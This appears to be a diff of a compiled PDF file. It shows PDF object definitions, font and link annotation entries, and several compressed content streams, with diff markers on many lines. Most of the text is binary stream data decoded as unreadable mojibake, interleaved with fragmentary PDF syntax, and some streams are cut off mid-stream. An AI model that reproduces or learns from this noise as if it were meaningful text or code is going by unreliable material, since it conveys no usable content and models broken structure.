obj << -/D [958 0 R /XYZ 72 622.939 null] ->> endobj -957 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F22 421 0 R /F26 513 0 R /F24 512 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -963 0 obj << -/Length 1988 -/Filter /FlateDecode ->> -stream -xÚ½XmoÛ8þž_a D"Z”¨7‹Ãv›f³h›´q»Hƒ,Ó¶®’¬è%iþýÎpHÙNÔ½l¶{l‘Ã!g8óÌCg´9£³£Û#_gÄG¡; -c‡ñ8¥ÅÑÍÜ-þëÈa"ŽF÷Š«‰ ‚o>º:úxôzv4yëòQÌâÀ F³­á±ØóG³åèÆòÙØŽba]7ÉZŽç³_'o¹¿Ç/üˆ9TÜQˆ,GŽVí}Av0Š`­@àZ¶ð<Æ=Lˆ˜Ö¼Ùl¦E1mš±í»¾õþýäÍ›1·&¿ÿ>Ga°Í]Ø¡§ÙgI½–-1_z7¿9/ý¿2m³mIäj›•íüæ2©“B¶²næ7;Y?ਰ¶5qeåj[ÉnZ ܇œ][uZ”™u—äœXÊv‹¾ =½¹Ë±Y²FAY¹ÛnÀ­v#±áX°cn%h/i¤–·lZê”[œ{½Ð·šÛ¼H*ÃÖt…lh‘$ωz°$$y-“å±Õ²­3y§ÔYözhÎ4ÉÓ.OZ ª4JrëV™Ã8ÂcÑÖrY®Û ¨ç¥²¿.MÆüšU®åº{vâŽÃ|?4ú÷駫ó‹Ÿß‚`ÈœÀ5üZ`R.IPoŒñYÙ»«z[pp+OÐÐHJÇnhm+)@…{k…ÊZjâ–†ZtšYD-¶+e"›ƒ²µ¥4H¦çi[BÓ@‹=+œ…Q3åè¨øAÿ¡Ý47àLV=ÅîèûjÓ¶Õt2á¡ËxÀ\Е³Ç'„²Iµ†Æ¢ì?G¬ÚTÿÊ–?òWz`]Pó3÷„ÚwÌwuœ -ÒȾ#WÏj(¤^‘–oׯÈdz.î* -tŒ3ƆƒŸr…ãÍiÕ›óoA ÝUXPqFñý4)Çg§³c¢2”½dÓôÌ« –%ø~W0#a¼+¤!å8[þ™&4ùþj´•Ô–(!xê,ý?èàè$Û ³ù-0¯zËȥɚ¿¦Šx*‹$ýb«ØÅÞ›×ﯴ5.·M»®åÕÇwÿˆAZHî½é¶,œ²¥µU¶P„½ƒ®«ó¿+oeN°G¦†\Tî£$Yär­ -ª/ñ½Ê ½ô~WtlhÁÚù·æÈõÍ‘ûoN_ƒÀë³ùÞ"Sj¿;ýp6ûÏ”GÇ‹9b^¶¹ÔëÇÑKÃA.Ka‰r¿}z<Ö²v˜¤~Ä<æ?rœˆ»JmH›/ŠCWU}'tHÔSˆÍ¹Ùü]—]]¿¾š}Ò~rÛt -S[ùµ=ÑK|bœñ¼šge÷Õ^—݉‰P`.*ðvÚB[àì矩±NS[€?à¢5Ÿ¨ÿõ¢+[}ò"¯kãaÛ)*'@îƆ¹— “‚ê;JàúJÖÉ.¸›‡¦•…A?îC_(«—1®Ó0jv^¶µ¬2½¹ó…üú-Cö*$U•gig†l%ÓM¹¸?^þrI Ÿ¹,8!®Ÿª$5 Àz<$ä[YùY[… -fñü}‚QžlU|K‹)­¿‡zÚÁ•EC-†ÚJ¶éfïüÔ_ÛG@¢ëÄñþyô(ö}Ë8ÀÄþSð tùÇÁ{¬oû|¨*ò\raŠNCÎEl½Í»Î/pÌ€tÌbÿ³ã LŽ^äÑñ…´«áü{.^Å‘ Ïɧ…ºPèèkøE…°”$ܤݾ"±íªdƒ6¶Qg ÜÓ“lå^¨QðÖ!‘¦†:kÛQŽ[Ý0vVI‘åYRSï>k7Ô¢b!Œñ~ʪ%*ž”j úô—ìì¬ä˜B§_KÙ¤uVµ=¿¾u©&‘ŸZD8PoÞ›¤°w˜ð£ýº,†Â«%í3m‰5ÜjÐêI7~ÁcæÅ‹$¬¯·¾èº{¸‹¤%úΤ Ö’Æaï>ÁGèš©`:än&PÁµDT&T\‰¦4p»!ZoB vŠS$Ó<ž¸î_CL1áõ(cc[5Û(K°{T9Á¿‡';vÔŽ•ññ,OMSÅýÓœ -˜bŸ’ŽzV!‰”YS4Ä”a^Hm­%1.ŒÀ°”«¤Ë[PE>õ"?ÖX½&zE®†ý«+$N9ÜJlh@Ã\XE¢¤wƒÔ@- uxvPn ½€ùVƒ9édÀe¡ÏBÑ?dí®YŽò}û†3Ó"Hah˜— ÕIÞd…àÂPõbt0ÓsàM$Ìñ{íè†5ÙlõÚ€ïR³ß8t=ïÒW¶Evýy4 Æùn‘†T.·­ŽY >8D]UkO-å’ ä~g ë{:ëŸBeR$„9ÌáY¡ó?W™""sˆð ÂaˆòVdÞÐÆú…HÒz¦‚áf³Kk‘ÉT‘%÷ÌìÚ 0@Ù*Rf¸û¥âcOÞþƒž^KG<õÌ[®¥/ì(AÁYMïD™û¦ z¿Q… ¾[Ѷ÷ž1‘Ø¿j©Û ¾i©úѧ’¶%ݾìê“=+Ÿö«Ñðy9€¨ fŽg> endobj -964 0 obj << -/D [962 0 R /XYZ 72 793.935 null] ->> endobj -342 0 obj << -/D [962 0 R /XYZ 72 314.887 null] ->> endobj -346 0 obj << -/D [962 0 R /XYZ 72 182.484 null] ->> endobj -961 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -967 0 obj << -/Length 1677 -/Filter /FlateDecode ->> -stream -xÚµkOÛHð{~…UõTçT;»~Äv$îm ôx´ÚŒ³I|ØN(ÿþfvvCÒˆZŠ;»;ž÷kaÆÔ`ÆAç¦Ãae7Ç"fó(2’¬syÅŒ1œ¿7˜íE¡q+±2Ã뇰ÎóÎÇÎÞ¨ÓÛw¸ÙQßé£ ÑpíÈõÑظ4}»k…‘g^ÔñTt¯Fï{ûÜ_Ã÷üÐf”Øaˆ(¦D{jÞ}#Z}iYžëÚÜu°=/"š/»–ïøfy×ÌŠœàºËÍ›y—vyG'Ö‚Ö³¦)½›÷m‡A@vy¯–ôŠ*Næ¢7Í¿iÞØå¬ü;ïðø¹gZ×Dæ w=Ôõ¸cXܺ$e‰&V\—´:×RÈŽgGaŸ/mÛ¾’·l“Êuœ|µD>&o÷ŽÏ]‹3/2O¥„ú› b³Ù ËŽwE_]žìƒr§j;M2Kó)í®ã<Õko+2ÍLP‰z‘ %a±hÊECVJkå’¸jÒxþZ9E˜`1ºÅJ¤¦Ð„›*Kñ¿›`‹ê®Í\÷ì}3žÆiÞ†ô„bšíø;¾s‘O›©VL´,(ÈšæÚô½­¿î㋃«5jŠÂùðhøfDðɧ£/ÌgovÏG¸Â'Êkòv÷œÖO»goÞíž!†Çƒ•ãïk’Xx'o]Gßá/}¼vzLÐòåRTuZ´šîó»áÙðÎN?Ÿ\ïð6´ øCi¸³ú©wûù«kõ(4•-¼¨F„P÷™9í’Œ k©.2üYkßîCÝ’B€ãòÁVuæ»ú²"æÛ¾«4âŒý ÒSý û•ŽÞ£ñÁýâ£Õ¤¨V¹æùÞ}ܤ¢VY—ëbCé&’"×íµƒâÍaQd¾R… -MÜÄ×q­vœM‰öð[ Ù®’v8N›T—Ú31 -ß|Û±¡ÁØLÕ?Z>TÅx‘4¯¶uàð[œ•(‘ëº&2Â5¦¯7šQÚ@Ô×Íå8Mª¢.&PÜÐ5Ï?)@Tˮ똘7¸w Iòð̼LAûˆ'ø÷+á¶ÃuͶ‰+è?pi >¨´rm íäü¹†–Õ´÷³§úØ¢†‚ Øé¦æ­šΦ¶æ;YÑwßQ½óÈoëm/ØÈ?ئí7œ4|8#·£™/²k]”uƒö³°Zu%ÕÜ_¡ñ ÍqÚ?gytœ^;­]øµk„žU¹Þ£ªE¿Q5ÿ·;Îïµ3QÚ1¶]_ã!¤¯ñ'ûÚfngqŽOnf"We¥¾«‘­ç#‰å^ ZÅÿSɹwqx4:<Áj¹;΀dš§uSÅMñ@Jëë¸uÀÖןîÇ‹Ãs ªÈßÓÞ¶_îÖج|ó®ëà{Ú$qN@-Œ‚.tz=ãéæzU-[epçÀ?YÌãFÔt$C u¨!Œ¡¶q©bÏ(æ$§PŽ`tŒ’ÜlRtE ƒ&ÍÄ&ù¸ªÒe×ÞÚ~® S"é[ÏŠ®š·HÉõ%ʪ˜Ò˜‚»T  0 ‹*‘h0(h¢ÀF„’bAWêËÁ ºÈðîZQQCÉ„V•Ÿˆ 1mÄR„Ä™Å0j5wvË0JºŽíú~XcÈ€å8´Ç‹ZM(ðD‚é¤[Nçêl\TjZÁÙ\j›IUdÕ¥üH$)z] - -§%"D5áÔ„¿×„ÙzLN)02’|§%¥ˆ³†èàª@G–5-Ûÿ5`)D‹‡v¨Ù᭘ĠZÛ],Âʳ ¹L!;äñmŠÁ‰P!j‘‡÷¹ísw%дE/'5 ->O‘$>Hq«5¦å@nÍBz@Ê)⊬ð0²XÔÃÏè> endobj -968 0 obj << -/D [966 0 R /XYZ 72 793.935 null] ->> endobj -350 0 obj << -/D [966 0 R /XYZ 72 177.997 null] ->> endobj -965 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -972 0 obj << -/Length 1719 -/Filter /FlateDecode ->> -stream -xÚ¥XYoÛ8~÷¯² D*Yi[ -°[dÛ$M±M'hŠ4XÈc Õv¼¿~‡R²lÅ9öI<†só›¡,m®YÚYï¾gÃ×ÒlmìhcÏ2mÏÓfqïæÖÒXÿ¨Y&õ\m%¨bŽ\øFÚ¤÷µ÷×eopêØšgz#g¤]Þ!bzd¨]Ú>4û†ëQýªðç¬{ùqpj7èéÐ5- - µëq’ž%U{ê ²Gš ¼F”ó2(!¦M˜”zÈó÷¾1t†z¶.i‚ã¢oë÷Qìgf¶ÆcŽßöPe‹ gQ:“>¦ºaÌ3n‚Ø òÔ¿6×42jzîåÞ,Gq|dÓ[$º9¿8¹Ÿåô.Ì‹‡9»¯˜š”)~ÏR Nçk/Ï™¢[È‚Eˆ–Q}–¦¿B¦Ô±ˆy–:U&s%¹›³¢ŠJäݘÿy…„Bx\Z‘J+lËjqTÒ=iŽƒuZå»z°më¿p²ð Ä7½k|eë1Nü¼Ó?%DÀŸÖîösîiRe¥ÃXê«8–~„þTÚ)mQf[ EUIuésvr‰Û‹²ÌŽƒÕje‚>×××æ,a°²ú-aü!òº‹QÖNÇÁÊO€ÑVj–M².B/Ðð-šuóc îo»Øÿ)¹ïóé¸Û§\f¡µ;6콿ÐÞ'„n\ŠÃÁ"°¾¯Âb€ð+Z•YU¢R¼¼‡2îEƒ9ÍMå÷?bÿ׳4Iج¬yb€hƒ 2k§u¤ÖKä…w[Ø#Au•x‡Þ¨ä ÛÉÇ}°R°Ú{¯—÷HTTôÛB_Á©Ó¸«‚åÆñœ%5ìå~ÌJ&Qè°Ù?ÜTƒêÁ:ñãp¶GÇVz|?þz\œ_œÝvI¶¥ÒG¥õDÌ3Ä;/pÃ;¬$¨ oyáˇ/““Éäüý–: '~B‘GJd”Ÿ֥\øå¶6»éVåYñx$é[¶wIÚnÛwª[fšæ-¶?­vIt ÖX3ˆcí±ê™àè°oØ6õô+($ÄÑ¿…ˆKyuáÅ -Ìn7Å[¡éX²õùœql8’r B26GÎXµ]†QeBÀ.GCR¶kŽÇ²µ¹B\$Ä•€±žfD|uÝw\×>™ù RT` -¬KSÄa†;YžÎÁÍr5ÝÚ|¬8|qÉ9³¼¨Ea­‘ô.OãÖiWŸTS~fç`ÎP´Ë4oj{¥ÿü(E;‰¾ -ËŽ$cº¡Ñ?…³<-Ò;9|ý[X‚Ç:O>¿þ$76Ô)ÝO‹Ðˆá®2ƒèïa†£ã$ÈÙª8”2oØó¹ìÜ¿õ´%yÂfUÈ b×}H^”XÊZ ¶8Ï꺷ºm•¹ÎȤ#ú’^{#Ûê¦y¼uOžqcñi]8Ç760UU´ÄEeK¥Y\£íR%§Dç·{ìjºA»Ռ§ ïÐó}ÝŒãîQ—[m•’ÆUå­gýJHª@ »­ˆWÓdÕ‰¼}ðê?ú.‘•83á;ùÈ£€ÇÝLÛÕ™ ÎóÃìÔ†S‰¨°"ÝDZ9ÅcUÁXcyHe~YåÌì(–,¿îFùÉò;ñûP}—}b GpcD+p&øõñ ‡ñy•«d€Åó‹s¬Üá/ÛîKËvá/Ÿ.ÚZÏeT•CTõ+©*;Ê}…ßTÌ­¢µ$æ ^"³ -IÒø¥æTÇy×/Dùè³NÊNãäÁ3¥ž:èwÄpDઔg¾ð ¥E9Ï–bƒkhªvåY&¥õI|1½¦ Üx¦E†¯)‰ò¹} ´öØ1í‘éÀýZ›ØêÅ™Ía0 ÿ “R> endobj -969 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [434.164 395.066 529.063 405.857] -/Subtype/Link/A<> ->> endobj -973 0 obj << -/D [971 0 R /XYZ 72 793.935 null] ->> endobj -354 0 obj << -/D [971 0 R /XYZ 72 473.642 null] ->> endobj -358 0 obj << -/D [971 0 R /XYZ 72 226.622 null] ->> endobj -970 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -976 0 obj << -/Length 852 -/Filter /FlateDecode ->> -stream -xÚ•U]Ó:}ï¯È©DÝ|7Y !X´H€€®îÃÞêÊ›L³Nœ]úïÇé¥Ùu<Ù±gÎ93v<§t<çýâ~áãè9¾³ œMæ?Ëœ¼^Üì<§ÀõŽG¢,uTíDIŠ#w¾-¾,ÞnëËÀw2’%Aâl÷&FH²0v¶…sãÆd¹J³È½–´„ånûa}éÇ'ø(N‰aÀy²ðFj;qRÄ&‘Æ®¢0$~ê ‰¢Ìœ¹©ª‹º¾ÃÝr±{sõér黟ÇOR±¦4¹hÈ͸)ô¹ª‚qv%(3ï;®Ù “• áßçcûqñ_Ç22i¤¢·^šGÊÆÜÔ { #}!­”!;‹¹« "™·ÁqC2¿ÁÌaº‡e°qEo>rÚ˜‰Mf˜Ýóš¶ãœjðÃ2H](ÌÒ i8*êš6ã*gÍ°¹¢Õ6¹´Ïz¤Ç#Í¿^•}GM-ô+ÔúéÊÌõ®ve'’Â$&±Æ\}{s½\ùî­$zoq"MIšÅÇSdÒeçÆgÝd$F/²Ù¤&Ћ±­èX¶ê°yV°íÐg;ÛÞØ"±ûÊ •RíÆ\¯ýM@ü„¾¾þÚh_·%NÖí?Ö(Ò"²j_³â•o ^ -Qr(DwwÌaiÖ¬Ü36Pd@œI5£ƒûo‚%ˆîÉ4}ø‡5…x”;{ˆ²ZLÌÐ7r gð”Ïr* ªèŒ(DÐâIF]Ïó àW‡æÞÁaΰk ݪ€=Þ³â×Ñ7ãfµQVœÝÎhî ö_Åê81aðÕTvgïqÇ;š\`BýïÌ[XÙˆÚNü8œ§pz@Uº/äÄwk·Ó:5[nÕ1˜ -­w]ÇÿW£ä±¡#{éo -<™ÙÇv¢‡ Ï«P?tröëJÌhŸøm3™Õ zõÄßÎGæb^vÞA1Û÷{è ›3¦­5•5ß&¿¹ë5¨JLïúûw(pkíúLæÀ9mÐûsÕ·˜(çÆN‚”L?´|Î8ø%aþÝR•WO¡¨æ zԾ罬FF7ç@›¾=û?û{¾Û.~ž<¥ -endstream -endobj -975 0 obj << -/Type /Page -/Contents 976 0 R -/Resources 974 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 956 0 R ->> endobj -977 0 obj << -/D [975 0 R /XYZ 72 793.935 null] ->> endobj -974 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -980 0 obj << -/Length 580 -/Filter /FlateDecode ->> -stream -xÚ•U=s£0íù*í„¡Hs3ñÍ¥»9®ò¸°` °$bçߟ0Æ11`]%†}ûvßîje¡Yè§q0luZÈFk­CË´Ã%ÌØî,”ªÿ¯È2q ãÅöuRôÇømüˆŒ§c£Ð }ÇGQÖq¸fèz(JÑvá™ËUâÅ_ArXî¢×§íÝౘV„gth·ú¤¦¸}(¬[ì -»®i»nûabv>yUåê–~å9Þâ¹=ðÂj™ËÊvTún‡ýWb´{ ƒÍ0ð;àö¥lp"‹ªÜ1Ñ‚RȪ~4Y!ŽO÷DìAtØçÎsC¨€178%´IA|Š4ƒ(÷.ø)i8‡R¦ñ÷»G#€ë%v‘N¸|¬ýÐÿìaãñÛÀB/ÛB•‚Ü@Û$—öbZ›$1Í⥠«ÏxíÊ û¢’Q¹LÁ¿2bªæ‚R½È2¦3\YÁ…Lö„k fRц•ú㓲„!uÄ›qŪžDWS{GxñQPÈAs(ÑÕ©Dάüóy¬/›`Sô#¡®¢6ºÒ¬øœûñØû("ïP©õ5‰¬&r?Æi]%þcÀ˜ÅÚ׬íˆD—º>–ÚÔ’ÕSº®| Kgíq•ÍÆûÖë2®•r7¾“%”BéÍêi½ƒ¾ý*ß ™|EÒ˜‰¹½ U&ùL[ëJȬ8Í –ºP§zPs˜g ÔûÅ ywQµ™Î¶GÜ%s}éûó%2þ4Ï3‡ -endstream -endobj -979 0 obj << -/Type /Page -/Contents 980 0 R -/Resources 978 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 982 0 R ->> endobj -981 0 obj << -/D [979 0 R /XYZ 72 793.935 null] ->> endobj -978 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -985 0 obj << -/Length 1512 -/Filter /FlateDecode ->> -stream -xÚÕXmoÛ6þî_! Ã"-RÔ›bh»¤h±­+ê|R£ %ÆÒ¦7KTRÿû_äÚŽÚ¸/Á¶/&EïÞ=w$íZk˵^L6 ­ka+$V»DZ•”“ë¥k¥0þÊr#ëNI• "h ëíäÍäÙb2»$ØŠQÀZÜhŠ=ßZ¤Öµí£©ÅÔ¾êØšO—‹W³KìïÉS?B.…J:&Rdâh ;°" ¨”u¨ç!ìy²ƒ(õšº›:>ñí'r),sEqèÉëO²*ßô¼[ó˜À~<=ß ˜?Z0_åuÕw|†Ú—¬èø˜´ÈK.x'N“VºO§Z¼,ù›§§ë—h:žû#!PsCh!ƒãìÙs±ýÎõh¡úÄÎ;=Æts;õ}›yª?»MQ²F÷“º’ ×}ËìR/ùûÛ/u_«r@Lí?§‘g×½YÊŒ8OsúC xF4c»nd¿Ó¢Ì ÜNId´û.ï2¾2x)°w¾óP@ ©ri‰Z·Jö€Ô= -Ef„2ÃlBöÜÈ ðÀl'ñ"ÈŸäÕ§Úã|‹€b(ö±Fù£æS³™´ ûÝàÉØ£f«Gœd˜‘ÃÎÛ§W«AänFs!´cüŠUoç°W7Ží³?êN¬[þöͯZy„<äë®FBíœFÓ$N‘Wýg]õçz>©Ë&/¤ûä×j*É¡º/ž?×u’8¶œcÉôÎõÝ«U_‰^ËKYâ`ÐÔ«QŒAïÍJà±Ló -\‚œeœ¥óÑ=¹ËÁlÍ…_½`ÇLâ/2)ã½g<3ß®‰ý˜±ó¦‡—ÓHŽ<ÏêÜ,8%â¿\€ýgW/–;÷§G!Ú½v†¿à­s›ÃÇì§Õ^>¹áNá®ßÞ÷Þ‹É?õœšÛ -endstream -endobj -984 0 obj << -/Type /Page -/Contents 985 0 R -/Resources 983 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 982 0 R ->> endobj -986 0 obj << -/D [984 0 R /XYZ 72 793.935 null] ->> endobj -362 0 obj << -/D [984 0 R /XYZ 72 517.33 null] ->> endobj -983 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -993 0 obj << -/Length 1800 -/Filter /FlateDecode ->> -stream -xÚ­XmsÚ8þž_á¹¹fæ,ü -67½$!¥—”édÒLÇ€]ýBd; ÷ëoW+HH›ëÝ´’WûòhwµÂ6†mœÜ80Ú†c´]£Ù̉"cšÜÜÚÆ Ö?6ó£ÐxP\©á·BãòàÓAo|Ð컎±¨å¶Œñœdx,òc<3nÌkXaä›G¢˜&±H¹lÜŽ?6ûN°µÉBfû Um‰hÛ”ö_õ¿Ø]ÀCl1ž%Úûôñåi€¡nÀ\[ŸÃù -ñéhÜ-F¯ÍZn»+Ëš¢àÁžÖ¬–ÜnцB10EA£äÓ!Fþ-ávÓ d"&tÝ’Þ„Ú¼ø+€æªKò¦.©ìÝ.@J06‹{r!Ï­`R—5”ð²¶À©â¸èÆ‚ÞÝgžßrwzUßfúºkagÛßïÁmÕݶêîvÓj5@0ÎDQJ1©¨oÀxuu7 Kuu·M=¥ÛUÜz|IBÔ„îyš@2¯lšƒÐ%´úy0þp~5¦Iwx­WŽã˜ÝѨ;_ÿ^‹…»°ÞÆï±Ùàپƀ¬"S@À -åÌpO,e¬;1lµñ ´9sâ8;áêáÐÛ€Û¿ÛœÆךIS0_^ÒbEhÒ%† µuÔ€>x<8¼:íŽôúÕèâüò˜ó%×f¢½{Ü8^Qãr±ÉOhrQM1%úTLyV?)æÊ7Øzçà ž«A'ª\b˜(*W1'4­—«L@5ÁÐÞ’¦eK^èf6+ÄÇ¢E½•$ÄwBs0ßl 7†¨Æ‰,/õJq Åßxªs`\AC«^Y4]æ*y]ÆäÂ^ 3®BAEG.¿ákÆÞzõÁ$ƒ%ƺj}#3.KÝöã"º“!± ¯OQ¯¶Ö¢©…vm]‚*ªÚbÅZ?NÅb‰Ÿ4#´m³ÂYB3—2¯è è`k“ÊZ, I®E¨XÇmššð âgÊÕ#µî{Z,x6¼`ûª’½]ÚºuÕIº+Æ äBÿ1Â>x_}Ò5²ÇeËYN|¯Úºï2l§Û6nTà%²»JÔOà´t¶ðúQ=ÃÀ‡"–äSýÁ ôóâ䂘þäú?8ê¼âÒé™ö£ôƒ®g÷Ÿõÿ/øŸåà™yAÇpOº.Kx¸Äò5Ï -úœ¾ðíH§r’ï¸ã×îøÿÊ^àEížÓûîsæx|ð ¼ä -endstream -endobj -992 0 obj << -/Type /Page -/Contents 993 0 R -/Resources 991 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 982 0 R -/Annots [ 987 0 R 988 0 R 989 0 R 990 0 R ] ->> endobj -987 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [71.004 143.771 176.596 155.724] -/Subtype/Link/A<> ->> endobj -988 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [357.083 143.771 414.687 155.724] +/Rect [357.083 151.022 414.687 162.974] /Subtype/Link/A<> >> endobj -989 0 obj << +865 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] -/Rect [71.004 124.995 150.852 136.947] +/Rect [71.004 132.245 150.852 144.198] /Subtype/Link/A<> >> endobj -990 0 obj << +866 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] -/Rect [326.94 124.995 385.235 136.947] +/Rect [326.94 132.245 385.235 144.198] /Subtype/Link/A<> >> endobj -994 0 obj << -/D [992 0 R /XYZ 72 793.935 null] +870 0 obj << +/D [868 0 R /XYZ 71 806.89 null] >> endobj -366 0 obj << -/D [992 0 R /XYZ 72 693.38 null] +434 0 obj << +/D [868 0 R /XYZ 72 760.449 null] >> endobj -370 0 obj << -/D [992 0 R /XYZ 72 342.027 null] +438 0 obj << +/D [868 0 R /XYZ 72 692.564 null] >> endobj -374 0 obj << -/D [992 0 R /XYZ 72 199.551 null] +442 0 obj << +/D [868 0 R /XYZ 72 586.394 null] >> endobj -991 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R /F20 418 0 R >> +446 0 obj << +/D [868 0 R /XYZ 72 511.909 null] +>> endobj +450 0 obj << +/D [868 0 R /XYZ 72 434.138 null] +>> endobj +454 0 obj << +/D [868 0 R /XYZ 72 351.27 null] +>> endobj +458 0 obj << +/D [868 0 R /XYZ 72 206.801 null] +>> endobj +867 0 obj << +/Font << /F21 503 0 R /F15 499 0 R /F22 546 0 R /F20 501 0 R >> /ProcSet [ /PDF /Text ] >> endobj -995 0 obj +871 0 obj [777.8 500 777.8] endobj -996 0 obj -[500] -endobj -997 0 obj << +872 0 obj << /Length 204 /Filter /FlateDecode >> @@ -4924,7 +3810,7 @@ xڕб E¡*ØAÐÉAœÔÑAQp(â£õQ|„Ž^m‚E\$|Kîî¿¥Úý.Iòj’:Šzm}< ’Tœ00µÍãÅ’”D1åŠdF§ãy‡"žÈG1¦•Orɘ Æ<²ÀºØ€spùªÁ"–²G¥…9¦5¡4ÐÒʳò’ëQ3ÎܬŒxÇ:n¨™Ø«–~y~VýåòCTáé(Ô™£ÙüF++ÃI‚ |Û A¨ endstream endobj -998 0 obj << +873 0 obj << /Length 194 /Filter /FlateDecode >> @@ -4934,7 +3820,7 @@ xڕн Å¡V0ƒ “ƒ8©£ƒ¢àСÖGé#ttp0!‰Šƒ á·ärÿ$§T< N‚z’“’4”´xBÅÉ®‘ô¥ÝSlMŠ#››}dzA—óõ€,]NI Ëh#ˆoQgЀ–‰J£rÀª½Û—ÜHþÿððîNÔN#¨œ80om[…ÓµÀ™xáŠ"mTé#lûG[âX»)¼ŽúiuÞe0Û€3+|RA endstream endobj -999 0 obj << +874 0 obj << /Length 99 /Filter /FlateDecode >> @@ -4942,7 +3828,15 @@ stream xÚM‰»@@DûùŠù®e­h=[H¨¢B© ü½x7¦8“œc×zÔtTÌп/ä 0CG·~—ú ‰…4Ô¤ †Ø’벤J© [E¯ƒÍx>Û_?îÈ-j\•]** endstream endobj -1000 0 obj << +875 0 obj << +/Length 152 +/Filter /FlateDecode +>> +stream +xÚ32Õ31S0P°bc#3…C®B.## ßÄI$çr9yré‡+qé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]>00ÿ!vâÿC Hþ €"ûb€¢:ª¡0ôŠ ¡ Ì`„ ð1€Œ¯o`øG`ãm¸\=¹¹…‘<¹ +endstream +endobj +876 0 obj << /Length 117 /Filter /FlateDecode >> @@ -4951,7 +3845,7 @@ x ˆ| ö õ ÿ!h€ —«'W %– â endstream endobj -1001 0 obj << +877 0 obj << /Length 111 /Filter /FlateDecode >> @@ -4965,7 +3859,7 @@ x ìÿAà?˜úÇ@g¶õÿƒz0u€ËÕ“+ Áç+3 endstream endobj -1002 0 obj << +878 0 obj << /Length 281 /Filter /FlateDecode >> @@ -4973,7 +3867,17 @@ stream xÚuѽJÄ@à )Óì ;/pæ“Sç ¦ÎÊB¬ÔÒBQ¸BâÂv>‚Ïß$peŠ8;»çå¢n±»³ 3³Ù~vˆNœÄSLcLð.†GHºŽpšmb·0+ ¼Â4ðœøüôrálqŠ1„s¼Ž1ºbŽ‚VÞšÝë{MuPJ{µ oM”Â7´"Øâ5?ÐKŠûZØgcGý?ÒQýFö´vè¸>*jˆ¹Ìµh¹è]> +stream +xÚ…1jÃPDç£âÃùÑž _BÄ`8D…Á®\„T±Ë€Pr³A¥ #g\¸óÂ[ØÙa&Ïîó\M ®¼Ð"Ñ]*’Íx'Óùÿy{—E%~«ÙLü3eñÕJ¿>¿÷âëGMÅ/õ%ÕäUª¥GÀž€8 +˜›5p›€&êÐXâ€æ†Ü‘[2ÀÐÀ 5ùAÔ°Ä…q7¢íŽ81„ÙÑpó{ ì€0#åéEÙR¶–ßgΰØÙ ê,µôz¯ 툙U’öÖ–ü1 +òTÉFþÈEŒ +endstream +endobj +880 0 obj << /Length 219 /Filter /FlateDecode >> @@ -4982,7 +3886,7 @@ x æÂTÌB?…KkÙÝ Y +xir§ endstream endobj -1004 0 obj << +881 0 obj << /Length 275 /Filter /FlateDecode >> @@ -4990,7 +3894,7 @@ stream xÚ…ÐÍJÄ0ð顃}ƒí¼€öƒÍ² º‚=îɃxR‚ŠÂÄæÑú(y„{(3itáG&Édfôêd^QAeEÇ-–¤Wt_ªg¥5G Z”áèîQmj•_“Ö*¿à¸ÊëKz}y{PùæêŒx¿¥›’Š[Uo @<âˆ9ufÆ8g׋:&í°ç£ëh€¬FŽ÷ˆOÂ^|I‡ÌòÓNî{Œ§‘?,œ''Oìi%ÉÉõ‘”_ùàMÀü à–?ØK¯ÀÓ´ L Áz¢@;uÙúž3Áå2<ÛŒ+ãÙ¦Œ ÕJfWÄ-ƽ<Ï%5¾Þß’“É uöP›:¯ÕN}°m» endstream endobj -1005 0 obj << +882 0 obj << /Length 249 /Filter /FlateDecode >> @@ -4999,7 +3903,7 @@ x #ˆÎé£åQú3T¸÷Ç6MªÈú”‹íß縛…»—Jnu¸¥,ïä£æov•àÑW|Ø~ñªeû*®bû¨U¶í“üþì>Ù®ž¤f»–·Zªwn×BÆ{ÿG4êûèQ ù@ÅdNAÂÄBí¢Í^=•IÝ T‹d¬%sµ™÷˜Ú]KsýÄbr¦h6ó@Î^^43{2è±¹˜îƒzD!;‰(dý«­`ïÑ!´m¢X“Ú¯¡m㺠ZÆèB$B¤¹ŠÆRm7ó˜WúKPËÄ›–_ø †×Šæ endstream endobj -1006 0 obj << +883 0 obj << /Length 245 /Filter /FlateDecode >> @@ -5009,7 +3913,18 @@ x r˽üN¾}È endstream endobj -1007 0 obj << +884 0 obj << +/Length 270 +/Filter /FlateDecode +>> +stream +xÚmѽJÄ@ðÿ±ÅÂÞ˜yÍ— pppž` +A+ ±RK EÁBÈ>Z:_#oà–)BÖ™½wáGf6󱩧ł2Ê :)¨:£òœžrójÊ’£UyL=¾˜umÒ;*K“^qܤõ5½¿}<›t}sAü¾¡ûœ²So€qĬ¼=f¼ï–›9fîðùÅ©Ëh€¤FŽ÷PC@s€>ítü©“óh¤G˜[†€ +´Rd‡ÔúÃJÉ " h"ö|š÷<zØŽÙtÄí! Í#ݲsi‘DÚ0$§'x,.$cq/õcÁ÷¢¿­,±Òág J +z·ß\ÖæÖü­U +endstream +endobj +885 0 obj << /Length 203 /Filter /FlateDecode >> @@ -5019,7 